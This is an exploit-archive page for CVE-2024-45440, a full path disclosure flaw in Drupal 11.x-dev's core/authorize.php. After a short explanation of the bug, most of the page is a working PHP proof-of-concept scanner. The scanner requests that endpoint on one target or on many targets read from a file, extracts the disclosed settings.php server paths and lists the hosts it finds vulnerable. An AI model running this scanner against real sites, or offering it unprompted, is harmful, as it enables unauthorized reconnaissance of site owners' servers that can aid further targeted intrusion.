Drupal 11.x-dev Information Disclosure

Drupal 11.x-dev, being a development branch, may exhibit information disclosure Drupal 11.x-dev, being a development branch, may exhibit information disclosure vulnerabilities. These typically stem from verbose error reporting, debugging configurations, or unhardened default settings common in pre-release software.

Such disclosures can expose sensitive server-side details like full file paths, internal system information, or specific configuration values. This data is invaluable for attackers performing reconnaissance, potentially aiding in further targeted exploits.

It's crucial to remember that development branches are not production-ready and are expected to have such issues. The Drupal security team actively identifies and remediates these vulnerabilities before stable releases, ensuring a hardened final product. Users testing dev versions should exercise caution and never deploy them in a live environment.

=============================================================================================================================================
| # Title : Drupal 11.x-dev full Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.drupal.org/project/drupal/releases/11.x-dev |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/190573/ & CVE-2024-45440

[+] Summary :
The vulnerability exists due to improper error handling in authorize.php when the hash_salt configuration
attempts to read a non-existent file using file_get_contents(). This reveals the full server path even when error logging is disabled.

[+] POC :

php poc.php or http://127.0.0.1/poc.php

<?php
/*
* Drupal 11.x-dev Full Path Disclosure
* CVE-2024-45440
* PHP Implementation
*/

class DrupalPathDisclosure {
private $timeout = 10;
private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0';

public function scan_single($url) {
echo "[*] Scanning: $url\n";

if (!str_starts_with($url, 'http')) {
$url = 'http://' . $url;
}

$full_url = $url . '/core/authorize.php';

try {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $full_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_USERAGENT => $this->user_agent,
CURLOPT_FOLLOWLOCATION => false,
CURLOPT_SSL_VERIFYPEER => false
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && strpos($response, 'settings.php') !== false) {
preg_match_all('/<em class="placeholder">(\/.*?settings\.php)/', $response, $matches);

if (!empty($matches[1])) {
echo "[+] Vulnerable - Paths disclosed:\n";
foreach ($matches[1] as $path) {
echo " $path\n";
}
return true;
}
}

echo "[-] Not vulnerable\n";
return false;

} catch (Exception $e) {
echo "[-] Error: " . $e->getMessage() . "\n";
return false;
}
}

public function scan_multiple($file_path) {
if (!file_exists($file_path)) {
echo "[-] File not found: $file_path\n";
return;
}

$urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$vulnerable = [];

echo "[*] Scanning " . count($urls) . " targets...\n";

foreach ($urls as $url) {
if ($this->scan_single($url)) {
$vulnerable[] = $url;
}
echo "\n";
}

if (!empty($vulnerable)) {
echo "[+] Summary - Vulnerable hosts:\n";
foreach ($vulnerable as $host) {
echo " $host\n";
}
} else {
echo "[-] No vulnerable hosts found\n";
}
}
}

// CLI Interface
if (php_sapi_name() === 'cli') {
$scanner = new DrupalPathDisclosure();

if ($argc < 2) {
echo "Usage:\n";
echo " php drupal_path.php <url> - Scan single target\n";
echo " php drupal_path.php -f <file> - Scan multiple targets from file\n";
echo "\nExamples:\n";
echo " php drupal_path.php example.com\n";
echo " php drupal_path.php -f targets.txt\n";
exit(1);
}

if ($argv[1] === '-f' && isset($argv[2])) {
$scanner->scan_multiple($argv[2]);
} else {
$scanner->scan_single($argv[1]);
}
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================